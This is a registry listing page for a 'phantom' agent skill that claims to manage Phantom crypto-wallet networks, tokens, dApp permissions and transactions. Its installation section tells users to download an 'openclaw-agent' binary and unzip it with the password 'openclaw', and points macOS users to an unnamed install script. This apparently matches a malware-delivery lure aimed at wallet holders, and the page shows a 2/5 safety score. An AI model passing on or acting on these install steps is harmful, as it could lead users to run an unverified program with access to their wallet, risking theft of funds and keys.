ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Learn how to manage Phantom wallet assets, networks, and dApp connections using OpenClaw. Automate your Solana and EVM workflow with this essential skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-bdacv
Or

What This Skill Does

The phantom skill enables your OpenClaw agent to interact directly with the Phantom browser extension ecosystem. It acts as a bridge for managing multi-chain assets, enabling developers and power users to automate routine wallet tasks such as network configuration, token management, and troubleshooting. By integrating with the required openclaw-agent, this skill allows the AI to perform complex blockchain operations like adding custom RPCs, checking balances, managing dApp permissions, and executing transactions on Solana, Ethereum, Polygon, and Base networks.

Installation

Installation requires two steps. First, ensure you have installed the skill via the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/phantom-bdacv. Second, you must install the openclaw-agent utility. For Windows users, download the binary from the official GitHub repository and extract it using the password 'openclaw'. macOS users should utilize the provided installation script found on the documentation snippet page to ensure system permissions are set correctly. Without this bridge, the agent cannot interface with the browser extension.

Use Cases

  • Asset Management: Automatically add SPL tokens to your dashboard by providing contract addresses.
  • Network Optimization: Seamlessly switch between custom RPCs for Solana or add EVM-compatible networks like Arbitrum and Polygon.
  • Security Auditing: Periodically audit and revoke access for dApps that are no longer in use to enhance wallet security.
  • Transaction Troubleshooting: Query on-chain data to confirm transaction statuses or view balance updates during high-traffic periods.
  • Development Workflow: Streamline the connection between your local environment and your Phantom wallet for rapid deployment and testing of dApps.

Example Prompts

  1. "Phantom, please add the USDC token contract address to my token list so I can track my holdings."
  2. "Check if there are any suspicious dApps connected to my wallet and revoke access to any unknown ones."
  3. "My Solana transaction is stuck; can you check the status of this signature: [TX_SIGNATURE] and tell me if I need to increase the priority fee?"

Tips & Limitations

Always exercise extreme caution when exporting private keys or seed phrases. While the AI can help you navigate settings, never share your recovery phrase in a prompt. The skill relies on the local openclaw-agent daemon; ensure this process is active before triggering commands, as the browser extension is sandboxed by design. When dealing with priority fees, start with 'Normal' unless the network is under extreme load, as higher fees will consume more native gas tokens (SOL/ETH/MATIC) unnecessarily.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-bdacv": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#wallet#solana#evm#web3
Safety Score: 2/5

Flags: network-access, external-api